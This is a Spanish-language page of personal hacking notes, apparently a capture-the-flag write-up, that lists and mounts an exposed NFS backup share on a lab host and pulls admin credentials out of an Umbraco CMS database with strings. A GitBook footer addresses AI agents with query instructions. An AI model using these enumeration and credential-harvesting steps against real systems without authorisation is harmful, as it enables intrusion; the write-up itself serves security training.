> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/ports-and-services/nfs-2049/nfs-service-site_backups.md).

# Servicio NFS - site/\_backups

Lista las comparticiones exportadas con `showmount`:

```bash
showmount -e 10.10.10.180
```

El `/site_backups` la exportación es visible para todos.

<figure><img src="/files/08a2706662cdd18f4e05eceded4976c8476412bb" alt="" width="563"><figcaption></figcaption></figure>

Para acceder a esta exportación, crea un directorio y móntalo localmente:

```bash
mkdir /mnt/mounted_files

mount -t nfs 10.10.10.180:/site_backups /mnt/mounted_files
```

<figure><img src="/files/25f8c2522d6d1a6334e3828381f7325cea162791" alt=""><figcaption></figcaption></figure>

Utilice `tree` para listar la estructura del directorio montado:

```
tree -L 2
```

El montaje contiene un `.config` directorio de configuración y un `sdf` archivo de la base de datos de Umbraco utilizado por el CMS en el puerto 80.

<figure><img src="/files/7033e3091ab65a8ad86b18e380123fa41931c9bc" alt=""><figcaption></figcaption></figure>

El `.conf` el archivo no contiene nada interesante, y `umbraco.sdf` es un archivo binario.

<figure><img src="/files/4db80122439f7109073df22733462dd97149feb6" alt=""><figcaption></figcaption></figure>

Utilice `strings` para extraer caracteres legibles y guardarlos para un análisis detallado:

```bash
strings Umbraco.sdf > /home/jordan/Desktop/htb/remote/content/output
```

La salida revela la contraseña `admin` y el usuario `smith`.

<figure><img src="/files/fe794b3447ad9ca603ed0eac72b275a3fa977350" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/ports-and-services/nfs-2049/nfs-service-site_backups.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
